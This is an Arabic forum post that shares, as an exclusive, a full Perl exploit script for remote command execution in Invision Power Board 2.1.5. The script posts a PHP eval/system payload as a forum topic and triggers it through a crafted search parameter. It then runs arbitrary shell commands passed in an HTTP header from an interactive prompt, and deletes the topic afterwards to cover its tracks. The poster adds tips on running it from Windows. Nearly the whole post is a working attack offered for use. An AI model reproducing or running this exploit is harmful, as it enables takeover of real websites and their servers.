| Xx.Youri.xX |
03-05-2006 10:52 PM |
السلام عليكم
حصريا على ثانويه
لاول مره على المنتدايات العربيه هذه الثغره
ثغره منتدايات Invision Power Board v2.1.5 مع الاستغلال
الكود
كود:
[COLOR=red]#!/usr/bin/perl[/COLOR]
# Wed Apr 26 16:44:15 CEST 2006 jolascoaga at 514.es
#[COLOR=purple]X x _ Y O U R I™ _ x X[/COLOR]
# INVISION POWER BOARD 2.1.5 <www.invisionboard.com> pr00f 0f c0ncept
#
# remote command execution. vuln credits goes to IceShaman.
#
# works only if you have perms to post a comment. Exploit with replye is
# in my TODO...
#www.ELOSTAZ.com
# 514 still r0xing.
# !dSR the hardc0re hax0rs;)
# There is no kwel comments in this release, wait for next upgrade
#######################################################################/
use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;
$| = 1; #;1 = |$
my ($proxy,$proxy_user,$proxy_pass,$lang);
my ($arg_host,$debug,$ipb_user,$ipb_pass, $lang, $errors, $topic_index, $tmp_var);
my ($md5_key, $post_key, $tmp_var);
my %lang_es = (
* * * 'name' => 'Spanish Language',
* * * 'login' => "Ahora est s identificado",
* * * 'incorrect' => "Nombre de usuario o contrase a incorrectos",
* * * 'deleted' => "Tema Eliminado"
);
my %lang_en = (
* * * 'name' => 'English language',
* * * 'login' => "You are now logged in",
* * * 'incorrect' => "Sorry, we could not find a member using those log in details",
* * * 'deleted' => 'Topic Deleted',
);
my %lang_strings = ();
my $ua = new LWP::UserAgent(
* * * * * cookie_jar=> { file => "$$.cookie" });
my $options = GetOptions (
'host=s' => \$arg_host,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'ipb_user=s' => \$ipb_user,
'ipb_pass=s' => \$ipb_pass,
'lang=s' => \$lang,
'errors' => \$errors,
'debug' => \$debug);
my ($host, $forum_index) = $arg_host =~ m/(http.*?)index.*?showforum=(.*)/;
print "Host: $host\nForum Index: $forum_index\n" if $debug;
&help unless ($host);
# w0w0w0w0w0 is smarter than some one i know :D
if (!$lang) {
* * * lang_autodetect();
* * * print "Detected lang is: $lang_strings{'name'}\n" if $debug;
}
while (1){
* print "invvy:\\> ";
* my $cmd = <STDIN>;
* &invvy($cmd);
}
sub invvy {
* * * chomp (my $cmd = shift);
* * * LWP::Debug::level('+') if $debug;
* * * $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
* * * $ua->proxy(['http'] => $proxy) if $proxy;
* * * my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
* * * ipb_login (); # This works with redirects enabled/disabled
* * * ipb_post(); # Post in a main forum.
* * * ipb_exec ($cmd);
* * * ipb_delete ($forum_index, $topic_index);
}
# guglucitos team presents:
sub help {
* print "Syntax: ./$0 <url> [options]\n";
* print "\t--ipb_user, --ipb_pass (needed if dont allow anonymous posts)\n";
* print "\t--proxy (http), --proxy_user, --proxy_pass\n";
* print "\t--lang=[es|en] (default: autodetect)\n";
* print "\t--debug\n";
* print "\nExample\n";
* print "bash# $0 --host=http://www.somehost.com/index.php?showforum=2\n";
* print "\n";
* exit(1);
}
# sponsorized by coca-cola
sub lang_autodetect {
* my $req = HTTP::Request->new (GET => $host."/index.php");
* $ua->proxy(['http'] => $proxy) if $proxy;
* $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
* print $req->as_string() if $debug;
* my $res = $ua->request($req);
* my $html = $res->content();
* if (($html =~ /Bienvenido,/) or ($html =~ /Fecha y Hora actual/)) {
* * * * * * * %lang_strings = %lang_es;
* * * * * * * return;
* }
* if (($html =~ /Welcome,/) or ($html =~ /Time is now/)) {
* * * * * * * %lang_strings = %lang_en;
* * * * * * * return;
* }
* print "Unknown lang switching to default: 'english'\n";
* %lang_strings = %lang_en;
}
# login function for 2.1.5
sub ipb_login {
* * * my $content;
* * * my $h = $host."/index.php?act=Login&CODE=01";
* * * print $h . "\n" if $debug;
* * * my $req = POST $h,[
* * * * * * * 'referer' => $host,
* * * * * * * 'UserName' => $ipb_user,
* * * * * * * 'PassWord' => $ipb_pass,
* * * * * * * 'CookieDate' => 1
* * * * * * * ]; #grab these, and send to dsr!
* * * print $req->as_string() if $debug;
* * * my $res = $ua->request($req);
* * * if ($errors) {
* * * * * * * print "[+] Context: Login in\n";
* * * * * * * print "HTTP Error code: ".$res->code()."\n";
* * * * * * * print "HTTP Location: ".$res->header("Location")."\n";
* * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
* * * * * * * print "- ERROR -\nFind string: ".$lang_strings{'login'}."\n$error\n- ERROR -\n";
* * * }
* * * if ($res->code() eq 302) {
* * * * * * * $content = redirect ($res->header("Location"));
* * * } else {
* * * * * * * $content = $res->content();
* * * }
* * * if ($content =~ /$lang_strings{'login'}/ or $content =~ /Logged in as/) {
* * * * * print "Logged in\n" if $errors;
* * * } else {
* * * * *die "Can't log in\n";
* * * }
}
sub redirect {
* my ($addr) = @_;
* my $req = HTTP::Request->new (GET => $addr);
* $ua->proxy(['http'] => $proxy) if $proxy;
* $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
* print $req->as_string() if $debug; # MKSINK is r0xer
* my $res = $ua->request($req);
* my $html = $res->content();
* return $html;
}
sub ipb_post {
* * * # This is for posting into a main index.
* * * my $h = $host."/index.php?act=post&do=new_post&f=".$forum_index;
* * * my $req = HTTP::Request->new (GET => $h);
* * * $ua->proxy(['http'] => $proxy) if $proxy;
* * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
* * * print $req->as_string() if $debug; #dirty_epic r0x++
* * * my $res = $ua->request($req);
* * * my $html = $res->content();
* * * ($md5_key) = $html =~ m/var ipb_md5_check\s+= \"(.*?)\"/;
* * * ($post_key) = $html =~ m/post_key' value='(.*?)'/;
* * * print "AUTH check: $md5_key\n" if $debug;
* * * print "POST key: $post_key\n" if $debug;
* * * $tmp_var = int(rand(31337));
* * * my $exploitme = 'eval(system(getenv(HTTP_'.$tmp_var.'))); //'; # seeeeeei la weeeeei
* * * $h = $host."/index.php";
* * * print $h."\n" if $debug;
* * * my $req = POST $h, [
* * * * * * * 'st' => 0,
* * * * * * * 'act' => "Post",
* * * * * * * 's' => '',
* * * * * * * 'f' => $forum_index,
* * * * * * * 'auth_key' => $md5_key,
* * * * * * * 'removeattachid' => 0,
* * * * * * * 'MAX_FILE_SIZE' => 51200000,
* * * * * * * 'CODE' => '01',
* * * * * * * 'post_key' => $post_key,
* * * * * * * 'TopicTitle' => '514 pwned',
* * * * * * * 'TopicDesc' => '',
* * * * * * * 'poll_question' => '',
* * * * * * * 'ffont' => 0,
* * * * * * * 'fsize' => 0,
* * * * * * * 'Post' => $exploitme,
* * * * * * * 'post_htmlstatus' => 0,
* * * * * * * 'enableemo' => 'yes',
* * * * * * * 'enablesig' => 'yes',
* * * * * * * 'mod_options' => 'nowt',
* * * * * * * 'iconid' => 0,
* * * * * * * 'dosubmit' => 'Post New Topic'
* * * * * * * ];
* * * $ua->proxy(['http'] => $proxy) if $proxy;
* * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
* * * print $req->as_string() if $debug;
* * * my $res = $ua->request($req);
* * * my $html = $res->content();
* * * print "Location: ".$res->header("Location") if $debug;
* * * ($topic_index) = $res->header("Location") =~ m/showtopic=(\d+)/;
* * * if ($errors) {
* * * * * * * print "[+] Context: Creating post\n";
* * * * * * * print "HTTP Error code: ".$res->code()."\n";
* * * * * * * print "HTTP Location: ".$res->header("Location")."\n";
* * * * * * * print "Topic Index: ".$topic_index."\n";
* * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
* * * * * * * print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
* * * }
}
sub ipb_delete {
* * * my ($fid, $tid) = @_;
* * * my $req;
* * * print "Deleting Topic: $tid from forum: $fid\n" if $debug;
* * * my $h = $host."/index.php";
* * * $req = POST $h, [
* * * * * * * * * * * 'st' => 0,
* * * * * * * * * * * 'act' => 'mod',
* * * * * * * * * * * 'f' => $fid,
* * * * * * * * * * * 'auth_key' => $md5_key,
* * * * * * * * * * * 'CODE' => '08',
* * * * * * * * * * * 't' => $tid,
* * * * * * * * * * * 'submit' => 'Delete this topic'
* * * * * * * ]; # **** windows automatic reboot
* * * print $req->as_string() if $debug;
* * * $ua->proxy(['http'] => $proxy) if $proxy;
* * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
* * * my $res = $ua->request($req);
* * * if ($errors) {
* * * * * * * print "[+] Context: Deleting Topic\n";
* * * * * * * print "HTTP Error code: ".$res->code()."\n";
* * * * * * * print "HTTP Location: ".$res->header("Location")."\n";
* * * * * * * print "Topic Index: ".$topic_index."\n";
* * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
* * * * * * * print "- ERROR -\nFind string: ".$lang_strings{'deleted'}."\n$error\n- ERROR -\n";
* * * }
* * * # yow yow
* * * if ($res->code() eq 200) {
* * * * * * * *if ($res->content() =~ /$lang_strings{'deleted'}/) {
* * * * * * * * * * * print "Topic $topic_index deleted\n" if $errors;
* * * * * * * } else {
* * * * * * * * * * * print "Maybe there was errors deleting post: $topic_index\n" if $errors;
* * * * * * * }
* * * }
}
# shhhhh this is hidden
sub ipb_exec {
* * * my ($cmd) = @_;
* * * my $h = $host."/index.php?act=Search&CODE=01";
* * * my $req = POST $h, [
* * * * * * * * * * * 'keywords' => "HTTP_".$tmp_var,
* * * * * * * * * * * 'namesearch' => '',
* * * * * * * * * * * 'forums[]' => $forum_index,
* * * * * * * * * * * 'prune' => 0,
* * * * * * * * * * * 'prune_type' => 'newer',
* * * * * * * * * * * 'result_type' => 'posts',
* * * * * * * * * * * 'search_in' => 'posts',
* * * * * * * * * * * 'sort_key' => 'last_post',
* * * * * * * * * * * 'searchsubs' => '1'
* * * * * * * ];
* * * print $req->as_string() if $debug;
* * * $ua->proxy(['http'] => $proxy) if $proxy;
* * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
* * * my $res = $ua->request($req);
* * * my $html = $res->content();
* * * my ($redir) = $html =~ m/url_bit.*?\"(.*?)\"/;
* * * print "Redirect to: $redir\n" if $errors; # don't ask
* * * if ($errors) {
* * * * * * * print "[+] Context: First search\n";
* * * * * * * print "HTTP Error code: ".$res->code()."\n";
* * * * * * * print "HTTP Location: ".$res->header("Location")."\n";
* * * * * * * print "Topic Index: ".$topic_index."\n";
* * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
* * * * * * * print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
* * * }
* * * if ($res->code eq 302) {
* * * * * * * $redir = $res->header("Location");
* * * }
* * * # piere - tonite is a great song
* * * my $req = HTTP::Request->new (GET => $redir.'&lastdate=z|eval.*?%20//)%23e%00');
* * * $ua->proxy(['http'] => $proxy) if $proxy;
* * * $req->header($tmp_var => 'echo STARTXPL;'.$cmd.';echo ENDXPL');
* * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
* * * print $req->as_string() if $debug;
* * * my $res = $ua->request($req);
* * * my $html = $res->content();
* * * $html =~ m/STARTXPL(.*?)ENDXPL/s;
* * * print $1."\n";
* * * # no matter with you
* * * if ($errors) {
* * * * * * * print "[+] Context: Executed\n";
* * * * * * * print "HTTP Error code: ".$res->code()."\n";
* * * * * * * print "HTTP Location: ".$res->header("Location")."\n";
* * * * * * * print "Topic Index: ".$topic_index."\n";
* * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
* * * * * * * print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
* * * }
}
طبعا الثغره من النوع بيرل
لاستغلالها من نظام الوويندوز لازم يكون عندك برنامج
ActivePerl
سلام واى استفسار انا موجود .
Y O U R I ™ Z 0n1 |
